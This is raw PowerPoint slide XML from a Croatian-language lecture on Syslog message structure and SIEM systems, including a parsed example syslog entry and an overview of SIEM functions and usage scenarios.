              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>facility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>), određuje izvor log zapisa, postoje 23 predefinirane vrijednosti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Neke se koriste za zastarjele protokole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Dozvoljeno 8 razina za proizvoljne protokole (tzv. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> poruke)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>U pravilu Mrežni uređaji koriste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> poruke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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA5F97F-624D-ABF4-9D02-B73C37C88878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>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785938"/>
            <a:ext cx="59817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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47106" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rioritet pojedinog događaja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>se određuje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kritičnosti log zapisa(engl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Severity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Severity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, decimalna vrijednost od 0 do 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Koriste se za određivanje metode uzbunjivanja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="471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3573016"/>
            <a:ext cx="60007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65DE96-8827-49DF-406F-13F12835D5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="365126"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9954B9FF-6EDA-B8E2-811C-162EE67924AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="470972" y="218861"/>
            <a:ext cx="7886700" cy="2109693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E460A428-A80E-AF47-EAF8-C84B51F583C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412899" y="2474819"/>
            <a:ext cx="2088232" cy="2088232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C6F04D-A559-FC12-D445-EE291FC50DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119768" y="2132856"/>
            <a:ext cx="5989839" cy="3635055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350185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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Primjer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>&lt;34&gt;1 2003-10-11T22:14:15.003Z mymachine.example.com su - ID47 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>BOM'su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>lonvick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> on /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>pts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>/8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Izračunata vrijednost prioriteta je 34,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Inačica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> protokola koja se koristi je 1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Log zapis nastao je 11. listopada 2003. godine, u 22:14:15 i 3 milisekunde, prema UTC vremenskoj zoni,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Puno ime poslužitelja koji je generirao navedeni log zapis je mymachine.example.com,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Aplikacija koja je generirala ovaj log zapis je su -,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Oznaka procesa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> servisa je ID47,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Oznaka poruke nije korištena,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Ostatak paketa predstavlja log zapis u UTF-8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t> formatu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-R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1C52A-61B0-6A00-12D0-CC4DB52F1250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{274159DD-2D49-9D54-9C95-A2A5501C5DF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="SIEM Log Management: What It Is and Why It's Vital for Cybersecurity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7C84424-823D-9C6F-981B-15389E988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577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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>SIEM sustavi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53250" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Event Management) - Aplikacije koje omogućavaju centralno prikupljanje log zapisa te analizu, korelaciju, pretraživanje i uzbunjivanje.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dvije funkcionalnosti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> management) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log management, analytics and compliance reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEM (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Event management) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="sr-Latn-RS" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>real-time monitoring and incident management for security-related events from networks, security devices, systems and applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="593725" lvl="2" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="593725" lvl="2" indent="0" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" sz="1900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>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BAC0F-7361-4CF4-92E9-C5C0C3E9EA90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Tri scenarija korištenja</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96BB0A22-E49E-4038-8882-DC90D8DC67CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Napredna sigurnosna analitika u svrhu otkrivanja sigurnosnih anomalija/događaja odnosno pravovremenog otkrivanja incidenata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Odgovor na incidente – automatizacija i forenzika</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Osnovno nadziranje sigurnosti – log management (uskladivost)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197613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 end="1"/>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rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0"/>
              <a:t>Korelacija događaja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="sr-Latn-RS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55298" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
